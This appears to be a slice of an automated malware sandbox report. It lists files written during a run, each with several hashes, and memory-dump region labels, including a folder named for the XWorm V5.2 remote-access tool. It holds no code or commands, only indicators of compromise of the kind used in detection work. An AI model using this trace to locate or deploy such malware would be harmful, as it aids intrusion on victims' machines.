SHA256 6a29c844c7d3d3d9cf23f873d8b2c3c6ece0415d162948ecf584d6b8ff9789bd
SHA512 f4be7cf2558cc3075b43edc64ae98ffa35b42c631bf8413357d037a2c6717d20a72550b30131033725146219982f56ff5814f407c050b259cd8af9db99d0009a

C:\Users\Admin\Downloads\winrar-x32-701.exe

MD5 547e29c3d612a26d41545a31e6bac6c5
SHA1 939b73086c7c622e86fbbc1050d8cd407cc0beff
SHA256 503d7256ab2198b774c91da1e100960b40d333bcbd1df0bcaea68cfed3f2599e
SHA512 b04f136e6075c661230b9a01ab3ec94c1b5273f2e824947721c8cfc51468c51ed63513875776d59e665a50218e370d767e392ac3d10db0e385663c16ca361d7b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 d435526910387aa2a4ebb7a09c3b080c
SHA1 0aafcc27581a801dd740acffc1b2b65511b03bd8
SHA256 44f8ffaac98426cb08fecb38e6d4430687252ef45185664befe1ec86c76752b2
SHA512 daa30e540ffb8536a7a70924a3602d5496c781af94e07323f12a0a1c57653ce52abd52b4d003b91b3183209c3954082838add83a04e369f7e29c722a5ccdfb22

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 448471535469f66f38faa25906ab52c1
SHA1 38b716767522b87bc0f7f91d5727ea26a7bd36de
SHA256 eb360bc4890e37d64655def6bafe5aa5abb62afcd913dcfd1a9b092db526c4ca
SHA512 124a5518ed5dcb288ef9a51c7c9ccabda8f676bf4520ec2b42e12a34e85fefeedb964102d198c426ed714de091e25287a5bb9fd4582d21f62679f5396679d612

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 eb6b7909e41c315ad5ffa8957e6f15e7
SHA1 e6678822114f1e9b7816a7b25308bd8184d3ebce
SHA256 7c384ddfa88d3f6585281a2d6bf06e00df47ddabf1898140ced1a1749d128737
SHA512 8288f3de88afa59f864eb446fb3325fe2213f7be3893ccc40645cb18a44e6b68a04d17edad301ed182b6ce43145f2eb0ab7f382e46d524abf552dce9700718e7

C:\Users\Admin\Downloads\Unconfirmed 684374.crdownload

MD5 1712143238e09e8b8af93ce0a88f2129
SHA1 6c8c4e6c4d27a18aef7b1b7934e0e0b94595773d
SHA256 95ef8c34a3714535512dee4fde5b590393a51e7663dee8d2e10a72869a5a1f59
SHA512 8fb21aa32d7cc3ef7c1380ce2bd42be85403e0908e7fa41251b1b049418529cc387892312bf5ba465618d57e6afcfd38e22454c81379a85d38930c67646b854e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e2f01bb868e5ac6e1443e4fdba20bbb9
SHA1 a68feaaf1616110a9fc3d119bfe72a2ec721541e
SHA256 37a98ccfac42ecabb65f37e1ee62e74bb405e2a53cbbf2befbb515e572646aad
SHA512 adb9335676bee09933c66781fa43719c7d0af04d74b51ce0252be7cc5acbe61802061073f04a606b5a409b0f114dd551797b8453ab315d1cbeffea16651570f7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 6ad3ab5293348fb3c1681816437128bf
SHA1 ca91655566ea48337986423d45250c0bf17a05b1
SHA256 f6c3118f98b40e9af46d45571ec5d06de21685a9e90786368b8674424a90553c
SHA512 243d93827493a1268fd4b276c065dfc57e70970245089095a0ff020e5df7a7f105567aecc5183d96db27eda1b4c91e5551c23f10a123f63be36678f3493f1277

C:\Users\Admin\AppData\Local\Temp\e5f3a62\Load.html

MD5 1757c2d0841f85052f85d8d3cd03a827
SHA1 801b085330505bad85e7a5af69e6d15d962a7c3a
SHA256 3cf5674efaaf74beccd16d1b9bcf3ffb35c174d6d93375bc532b46d9b4b4ed35
SHA512 4a12a55aac846f137c18849302e74d34df70ea5aaff78d57fce05b4776bedcde9e1b1032734e29650bcbac3e6932dfef75d97931443446a23e21cf5b3072dd9a

C:\Users\Admin\AppData\Local\Temp\e5f3a62\common\js\jquery-1.11.2.min.js

MD5 5790ead7ad3ba27397aedfa3d263b867
SHA1 8130544c215fe5d1ec081d83461bf4a711e74882
SHA256 2ecd295d295bec062cedebe177e54b9d6b19fc0a841dc5c178c654c9ccff09c0
SHA512 781acedc99de4ce8d53d9b43a158c645eab1b23dfdfd6b57b3c442b11acc4a344e0d5b0067d4b78bb173abbded75fb91c410f2b5a58f71d438aa6266d048d98a

C:\Users\Admin\AppData\Local\Temp\e5f3a62\config\installparams.js

MD5 e949c47d0a8645b8a399ebc647024849
SHA1 4f4078121d033b59159960e0c81bfc6e10feb6d9
SHA256 6da3ba96d0b04cac2d98afbec36294dabb09fad5fef506845de7200d5cc71a84
SHA512 003011d481eb6d4e06da52eb46cf8e288fa0462bb2f59b6d5807223115147757d143e7667424ac929aad154935c506be80294afc69213e34d292ef29f11e6de8

C:\Users\Admin\AppData\Local\Temp\e5f3a62\config\stubparams.js

MD5 91f6304d426d676ec9365c3e1ff249d5
SHA1 05a3456160862fbaf5b4a96aeb43c722e0a148da
SHA256 823f4f8dfe55d3ce894308122d6101fed1b8ef1eb8e93101945836655b2aed1b
SHA512 530f4fad6af5a0e600b037fcd094596652d2e3bf2f6d2ce465aae697ea90a361a0ffcc770c118102a0dd9bf12ab830ac6b459e57a268f435c88c049c127491f4

C:\Users\Admin\AppData\Local\Temp\e5f3a62\common\js\common.js

MD5 87daf84c22986fa441a388490e2ed220
SHA1 4eede8fb28a52e124261d8f3b10e6a40e89e5543
SHA256 787f5c13eac01bd8bbce329cc32d2f03073512e606b158e3fff07de814ea7f23
SHA512 af72a1d3757bd7731fa7dc3f820c0619e42634169643d786da5cce0c9b0d4babd4f7f57b12371180204a42fec6140a2cff0c13b37d183c9d6bbaeb8f5ce25e5f

C:\Users\Admin\AppData\Local\Temp\e5f3a62\config\config.js

MD5 34f8eb4ea7d667d961dccfa7cfd8d194
SHA1 80ca002efed52a92daeed1477f40c437a6541a07
SHA256 30c3d0e8bb3620fe243a75a10f23d83436ff4b15acb65f4f016258314581b73d
SHA512 b773b49c0bbd904f9f87b0b488ed38c23fc64b0bdd51ab78375a444ea656d929b3976808e715a62962503b0d579d791f9a21c45a53038ed7ae8263bd63bc0d50

C:\Users\Admin\AppData\Local\Temp\e5f3a62\common\js\external.js

MD5 140918feded87fe0a5563a4080071258
SHA1 9a45488c130eba3a9279393d27d4a81080d9b96a
SHA256 25df7ab9509d4e8760f1fdc99684e0e72aac6e885cbdd3396febc405ea77e7f6
SHA512 56f5771db6f0f750ae60a1bb04e187a75fbee1210e1381831dcc2d9d0d4669ef4e58858945c1d5935e1f2d2f2e02fe4d2f08dd2ab27a14be10280b2dd4d8a7c6

C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe

MD5 1a8e15de0c4de9ff87e90268f780d1be
SHA1 e90ee17d0d92b18efbb3f261d16b49742781a44e
SHA256 4cfffb2178202505422fc9612d3418ed1ee58d72a22fdde34d5ec4010285c874
SHA512 676438645c4b24d17d85a259ec587b494d418d84309651b7336935d019c0baf86648adaa6096273cb0848e7aaa0f0bd806aa6e3b3916bd03a5721d107601cdd9

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

MD5 f2d14ff6375c24c821695ec218f2330b
SHA1 9d7b115c16d2ed5c3e6c3da19ccb495b3eb66b7b
SHA256 f9819b0b98e30da8b8f7c08191234ccf0bf03a33b7fd41fe93f120f974a8990a
SHA512 972814a3334ac85a30643778fceeb6f9a550d6dd578a0966fca9fbe6f36fc4e899e0a1b0534fe1d245c6f17ceb038d14d0989d31fb13f5b1556e188bb38c8b3e

C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

MD5 450b5544c5fceaeb26fc3a7d8d03e340
SHA1 f04c0c0563ed860b0d6b7fce1c854a969a207654
SHA256 95d0a1583a98a413e6ac06ef5c71aaaedb88b9de8fa557ab0d5fcf8615b1c43d
SHA512 0705f6b3ed32cc8729f7ddda82ebb8ece12b802708b623c54ed887f1d3367c012ef9490388f5307f7f4a6dc46355214dc69c3e200f2ee8e7a136019d76b2c481

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 ff39076f5a43400d45689507727e758f
SHA1 ded9f119ccd158476b633773f6bbe724e4bf50b2
SHA256 40ad3b3f336e5adf83c97849d89049a3beded14de63bc798568f8f0203f02498
SHA512 e78a68edd08333f651e7b24e51547af18928faee3ae55cf9420cdbcf776327d6859c5fcdd501f1c685b962d0a310174d31a64725c0a63907c9d08fd618c9dfdd

memory/2536-2750-0x0000000000AC0000-0x0000000000AF5000-memory.dmp

memory/2536-2751-0x00000000701E0000-0x00000000703FF000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 b9834c69871b5a9da403e9f93512c143
SHA1 5b64781cc2c0795d7ad5dcc814850abc3253b6c5
SHA256 86576e900300c0207c2343c4d5ccc368a110650edf17a2b6ffceaa21db76d409
SHA512 5afe6f01f120f3937ed364af64c5192c7ce8d84bdb7014c1345528b7d7802a926bfcce955a6ce2f84ae83d9a75fafdc2bc4f017ad664440432d3ab336f7153f8

memory/2536-2765-0x00000000701E0000-0x00000000703FF000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 fe6e7dd49985fc51b91f4292fe5fc47f
SHA1 0f8322f050cc3e5dfa13a1e1b4cca8b2e71efed2
SHA256 4186b25d6bec4533f8da5e17453541a357ac3fede44d17b924baf142a06d1e38
SHA512 762528685f026ddccab3c5d700e86b64dcb00cf18d03d53ab2535c0caf8bac2738d2b21683a38d61571a58ba765a5534a07af6006467fd6bce5765ad5ab03ccd

C:\Users\Admin\Downloads\winzip28.exe

MD5 d7c6ccf487978c2eab86dae39ff98c5b
SHA1 2a045647b18fe9529952f0459b0daaea6c1f65b3
SHA256 b8d96793563a92e2f42886a43ae767280308451c435fc27838b50437676bacf4
SHA512 ddbe28d900cb989dac64add8b99f5488c702153aeeb527283d1618f905ab6b0a26c56a61a62100cb6afdee3297b69a99e83769eb3177a91df661298551042116

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 84028ac8c8fe9d1b8074b291f6e04dbf
SHA1 2686ea5e4aa2292c5171c30992176170ae7fd8fc
SHA256 3ab152aa9f3bebc1ab97d152e969da9158c057a8f46bad74b007757da6a6c0c0
SHA512 3aa85470d46ea8ebf4a3fb446b4cb5321e708d3294630c6fc41b5b34794cd52d4ccb9fcc9997c1593ef72669926098af625acce8a1dfc2257b899dbc551d6e5d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 072344d8dc8ae3af02b9abcac00b7f97
SHA1 03f1b0ca23e388923d4649395d71068190e3b243
SHA256 5f56468275975d3b1af2b6f7ff1b98c2255f520c4373388952799026c19f16e8
SHA512 65afedd50f95b669f2f407b8b3573e3c9f98587b5a7a3d88f92341fa69af8909783c442296f48a2d0398701cd29c6b75b7f6b136a1432343da7b79c7411bb6ed

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 1fb7d65d94d52edf6c056767d64d454d
SHA1 e5aad99d3ce66becdda9fc31da2e223ed2969c80
SHA256 ca34525af79d4fba8b05e6611482ad18f59f9d4b38b317a606107b746b78089b
SHA512 e257a1fe5ad60071946f7c8ea70dd7bce74eb430b36f289ca5d5517e17e07ac5c6d4749f8ae32830d41d52cca7e4bf3745649ec9621d058cb927ced5a49a1a4d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000081

MD5 1adf980c800a8214955359c07b147412
SHA1 d9e1b2e373eaa7ffd8abe896633a37d7b004db35
SHA256 d2a7600fd0097cd9a3d4122ba3fdc81819671bf195b090b343fdccdd0a88e0e3
SHA512 4873633e909eb86ccabed4b8678d3fac9e8fea1e09ed03db64400480465e6dd21a9c19e7ce81e398b38b60601aec1ebb922d55f9e0af56b446338ad6354eb81d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000082

MD5 aba0daa71428ba1f6ef843015f135a1a
SHA1 925b0e9eb91003651287bc51634b5d938a2fda7a
SHA256 bcec337ce30a0461d0332de95d7a355a62662bf904ad555f95f52eb8b549fec4
SHA512 321334368d67f456405e46916b3a2c2eab7a970255bbe25ba5abdbdb9200fdb647d17680bf542655c567fc9ac0f6a5c59f137941804dca194a817c0dd263640e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 4668690082e334cad05cc6f06cf129ef
SHA1 6b510662f43acfb670b38193695725906357f915
SHA256 d317b7afa68d5c11d9281df708a16a034d8d26f4e1d428f3043532acc835093b
SHA512 194681f48a12c06c4e73f9e512774aefbc2d4a0b447d755368c890b4cdea19257fdde2972d8315af0d99842bf032465828fff4efd2e5753e0788b51391cab692

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f2c08de5408533a83b615011365106bb
SHA1 707b512473dda64da2bb04357362921072c943e0
SHA256 9d4711602e258e9dd6ae9814d99ea52d8e5e0119ca66b67d4af383e3168e5397
SHA512 f7bb711d21e4e83f878dbfb6eef8b4890dc78c6a879054e2e8e048516d5445331191128ac0576bfda854db010b659699e773fb596f119e52a33799f456bb9f6d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 32c4c0bc620fa8f5e27667e15d0b3cd2
SHA1 253f1b2bf2c51c1e71ce7dd2c543164da61caf67
SHA256 3102946fe0a93600ba4054c4e0c2c888fd2cc9d2969d7d00baa378c70673769f
SHA512 e48741f5776981524bc7f355c74975599bd8118d036ff0471ab960705b9254de27005dbbf7ebd8c4962c923177c2355fd059109380639e5cfb3ec6290086290f

memory/2536-3122-0x0000000000AC0000-0x0000000000AF5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f9592e2c18c7efe025dfdf43554417ba
SHA1 900d93325c3d801f8e02ce9f2ad258610c21396d
SHA256 b14c9f347f60d216a739d0c78a2baa164b95ec933a0d2d242de5501585855834
SHA512 b86dffcb99d21bfed0c63497fa3160c43ed12958e7d2785706c57f1a372e3c726e8814e121b13ffae21458b9c667a892820b28e3d0978d55df63ee038a08d772

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 9d68b2c2af6c7fd18a4161fe23aea8e0
SHA1 a60187eac1a6ce8e6b95ceb77f589aa776809365
SHA256 431b439b5c33577bf199c6ea3d365ba9bdef82e57aee21bf101307f66ecf52aa
SHA512 b29f87bae891ba7951ef95d1ff4f05c881c70105be7affac0f25fbbbf9b1344c46129e15755e93fabc7d19f05fa4f87f732f099655bab5673392368f9adb4452

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 ebcabda9cf67bbf23b8229e7255d7a9f
SHA1 b53dcab51b0da30b453ce73a461527ccf332a5ec
SHA256 dfbcdac9a6c23b752c841541bc23da5b5566217f87098e76501aca46a964215f
SHA512 29e5e99663489441186e1af9507221f0c37d541fc635ba25e02fc5df7c4e9aa041bc0c89f509f61d6674300b0304a81e6c2e9493d6bcb2356c9cc8d952ef3848

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 5540dde8dccb6ceb2554c4dda9168f8f
SHA1 b3964c16510ba40f38c5e2a1f6e40410ae2e5e44
SHA256 547e1d1ac32389d249e4cb581731cc94ccc8b5e15967ffff6b48bd6a04e3fbe7
SHA512 5c97b8159de025724729ef6904164f3ffc44193c6e3364eec37ac1990c43ec006e476baca6b99858cd1c9e87dda8273390c6f21a4b46656a994e8bd9d89524e6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f8aa51cafa42d98e5398a106a2e91725
SHA1 d2438a2eb338f6c730f18eada446dd79706c2a5c
SHA256 380d689d3a9490890676a73dd7270a0950485ce733963402edbbaae41eee4dfd
SHA512 32b40b0b9aa71a7dfcd51f513480818e49438b61aa9513666494a0607873a32dc09d636ec608fa2ed8493a2ad8dedfd70a84fe633e10b6fcc24f079fe8a2f771

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1d729caf6e5a8ec684529c913551d059
SHA1 4381ba4f74962f12bc8f8afadbce122d4756745e
SHA256 6d78ab2b7a6a7b82cc594faa7e0a9d8bee9044a3f665c7a701422a8e76e0f91b
SHA512 1e09fcd0e4f4ef143766b7967f1c5685758265cbe3e838ddd83f9c758490858d56c28abbde4d01df63efd8ba3f317bc5a4cc0b9aef877c5234423c87ea376cb5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 f4549d1a4954621c8a0f4d9959934184
SHA1 744bc6cbafcddfea5909c45e55c088e0f30e4c4c
SHA256 7a9aa4f36177a325333b8203de5b42715b0334614989dc0d4330d369579551ee
SHA512 24213d755e3dea1e2b8e702be7c0960d5d8ef32281bb5c4de51c2a843c0a80e5edf49501c6cbb0b544af47c1de1b7e476560886c9b325e2f48f9d0312ce9f567

C:\Users\Admin\Desktop\XWorm V5.2\Icons\icon (15).ico

MD5 e3143e8c70427a56dac73a808cba0c79
SHA1 63556c7ad9e778d5bd9092f834b5cc751e419d16
SHA256 b2f57a23ecc789c1bbf6037ac0825bf98babc7bf0c5d438af5e2767a27a79188
SHA512 74e0f4b55625df86a87b9315e4007be8e05bbecca4346a6ea06ef5b1528acb5a8bb636ef3e599a3820dbddcf69563a0a22e2c1062c965544fd75ec96fd9803fc

memory/5324-3494-0x0000000000370000-0x0000000000390000-memory.dmp

memory/5324-3495-0x0000015E43DE0000-0x0000015E43E22000-memory.dmp

memory/5324-3496-0x0000015E5C500000-0x0000015E5C528000-memory.dmp

memory/5324-3497-0x0000015E5C530000-0x0000015E5C536000-memory.dmp

memory/5324-3498-0x0000015E5C6F0000-0x0000015E5C74E000-memory.dmp

memory/5324-3499-0x0000015E5C750000-0x0000015E5C7A6000-memory.dmp

memory/5324-3500-0x0000015E424A0000-0x0000015E424A6000-memory.dmp

memory/5324-3501-0x0000015E424B0000-0x0000015E424B6000-memory.dmp

memory/5324-3502-0x0000015E5C6A0000-0x0000015E5C6DC000-memory.dmp

memory/5324-3503-0x0000015E5C670000-0x0000015E5C68A000-memory.dmp

memory/5324-3504-0x0000015E5D500000-0x0000015E5E138000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TMzpx\TMzpx.dll

MD5 2f1a50031dcf5c87d92e8b2491fdcea6
SHA1 71e2aaa2d1bb7dbe32a00e1d01d744830ecce08f
SHA256 47578a37901c82f66e4dba47acd5c3cab6d09c9911d16f5ad0413275342147ed
SHA512 1c66dbe1320c1a84023bdf77686a2a7ab79a3e86ba5a4ea2cda9a37f8a916137d5cfec30b28ceae181355f6f279270465ef63ae90b7e8dcd4c1a8198a7fd36a8

memory/5324-3511-0x0000015E5E940000-0x0000015E5F52C000-memory.dmp

memory/5324-3512-0x0000015E5D1F0000-0x0000015E5D3E4000-memory.dmp

memory/3956-3515-0x000001C4DD260000-0x000001C4DD261000-memory.dmp

memory/3956-3514-0x000001C4DD260000-0x000001C4DD261000-memory.dmp

memory/3956-3513-0x000001C4DD260000-0x000001C4DD261000-memory.dmp

memory/3956-3525-0x000001C4DD260000-0x000001C4DD261000-memory.dmp

memory/3956-3524-0x000001C4DD260000-0x000001C4DD261000-memory.dmp

memory/3956-3523-0x000001C4DD260000-0x000001C4DD261000-memory.dmp

memory/3956-3522-0x000001C4DD260000-0x000001C4DD261000-memory.dmp

memory/3956-3521-0x000001C4DD260000-0x000001C4DD261000-memory.dmp

memory/3956-3520-0x000001C4DD260000-0x000001C4DD261000-memory.dmp

memory/3956-3519-0x000001C4DD260000-0x000001C4DD261000-memory.dmp

C:\Program Files (x86)\Microsoft\EdgeUpdate\Download\{1FAB8CFE-9860-415C-A6CA-AA7D12021940}\2.0.0.34\BGAUpdate.exe

MD5 3f208f4e0dacb8661d7659d2a030f36e
SHA1 07fe69fd12637b63f6ae44e60fdf80e5e3e933ff
SHA256 d3c12e642d4b032e2592c2ba6e0ed703a7e43fb424b7c3ab5b2e51b53d1d433b
SHA512 6c8fce43d04dd7e7f5c8bf275ba01e24a76531e89cc02f4b2f23ab2086f7cf70f485c4240c5ea41bf61cb7ceee471df7e7bdc1b17dfdd54c22e4b02ff4e14740

C:\Program Files\MsEdgeCrashpad\settings.dat

MD5 03769b901facfdbfcd55dfdd28604faa
SHA1 f5e0d238aae2f9da57e92b0962e20474053fa66e
SHA256 dcd0e48d8c3b8e62c2aaaa8c1a9365cb4fd9549e5eb4a91447d256573c7c249c
SHA512 f71c1d59bc44092926115d6be1ceb52bf15010fdea05a911278ef5c7767beccd9d896c63792e6e9cca8e9df4252d955697d1b9813d2c52bad6c3ed85ce1d4fc1

C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\Installer\setup.exe

MD5 7171f56da52529073c2bda6dad0fdcfa
SHA1 f29fb1d1182e46895bb3ccc38e05220087e92e93
SHA256 32c87af491ca80fc5c5594aa995669161b466957d7b444f3c388ece97b730aee
SHA512 8c81a87f1f77cbed95eff3986d14d7c05b919cdaeabfba0a1335331adadc1e97495332cb6d3969242a9d19f48aa9eb890f22b81f504af615ea5ff64b27c13c73

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\I3C6LG3F\error[1]

MD5 16aa7c3bebf9c1b84c9ee07666e3207f
SHA1 bf0afa2f8066eb7ee98216d70a160a6b58ec4aa1
SHA256 7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754
SHA512 245559f757bab9f3d63fb664ab8f2d51b9369e2b671cf785a6c9fb4723f014f5ec0d60f1f8555d870855cf9eb49f3951d98c62cbdf9e0dc1d28544966d4e70f1

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\9O7X9C7J\error[1]

MD5 b9bec45642ff7a2588dc6cb4131ea833
SHA1 4d150a53276c9b72457ae35320187a3c45f2f021
SHA256 b0abe318200dcde42e2125df1f0239ae1efa648c742dbf9a5b0d3397b903c21d
SHA512 c119f5625f1fc2bcdb20ee87e51fc73b31f130094947ac728636451c46dced7b30954a059b24fef99e1db434581fd9e830abceb30d013404aac4a7bb1186ad3a

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\J9NDGDSC\warning[1]

MD5 124a9e7b6976f7570134b7034ee28d2b
SHA1 e889bfc2a2e57491016b05db966fc6297a174f55
SHA256 5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9
SHA512 ea1b3cc56bd41fc534aac00f186180345cb2c06705b57c88c8a6953e6ce8b9a2e3809ddb01daac66fa9c424d517d2d14fa45fbef9d74fef8a809b71550c7c145

memory/5324-3605-0x0000015E69A60000-0x0000015E69BC8000-memory.dmp

memory/4804-3616-0x00000000001C0000-0x00000000001CE000-memory.dmp

memory/5324-3619-0x0000015E62870000-0x0000015E6289C000-memory.dmp

memory/5324-3620-0x0000015E69BD0000-0x0000015E69EB2000-memory.dmp

memory/5324-3621-0x0000015E67B60000-0x0000015E67BE2000-memory.dmp

memory/5324-3622-0x0000015E69490000-0x0000015E69542000-memory.dmp

memory/4804-3639-0x000000001BB80000-0x000000001BC30000-memory.dmp

memory/4804-3640-0x000000001C360000-0x000000001C888000-memory.dmp

memory/4804-3642-0x0000000002360000-0x000000000236C000-memory.dmp

C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\Installer\setup.exe

MD5 01cc712d5b9427fffe2495e444667809
SHA1 47c967cfd31b1e8ce4fb6deb8ddc4fc97d76b65c
SHA256 3b7409c2d26acf633e1da0426f49f4d15c4610b632b64eeab00f3d4b67ae12d5
SHA512 f20e0b5fd763916f3c00effbe06862b2adf4973fdfa41862bc8ffe02894784a8218263d66538864758ba9ff16d816f0c7ea82d704bab1994e72c8ebd850ff59e

memory/1944-3679-0x0000017374C90000-0x0000017374C9E000-memory.dmp

memory/1944-3680-0x0000017375150000-0x000001737515A000-memory.dmp

memory/1944-3681-0x0000017375180000-0x0000017375188000-memory.dmp

memory/1944-3682-0x0000017378600000-0x0000017378849000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html.~tmp

MD5 effecce1b6868c8bd7950ef7b772038b
SHA1 695d5a07f59b4b72c5eca7be77d5b15ae7ae59b0
SHA256 003e619884dbc527e20f0aa8487daf5d7eed91d53ef6366a58c5493aaf1ce046
SHA512 2f129689181ffe6fff751a22d4130bb643c5868fa0e1a852c434fe6f7514e3f1e5e4048179679dec742ec505139439d98e6dcc74793c18008db36c800d728be2

memory/4804-3818-0x000000001C890000-0x000000001CBE0000-memory.dmp

memory/936-3823-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp

memory/936-3825-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp

memory/936-3824-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp

memory/936-3826-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp

memory/936-3827-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp

memory/936-3828-0x00007FFDAD210000-0x00007FFDAD220000-memory.dmp

memory/936-3829-0x00007FFDAD210000-0x00007FFDAD220000-memory.dmp

memory/936-3853-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp

memory/936-3854-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp

memory/936-3855-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp

memory/936-3856-0x00007FFDAFB70000-0x00007FFDAFB80000-memory.dmp

memory/4804-3858-0x000000001BCB0000-0x000000001BCEA000-memory.dmp

memory/4804-3864-0x000000001B6D0000-0x000000001B6DE000-memory.dmp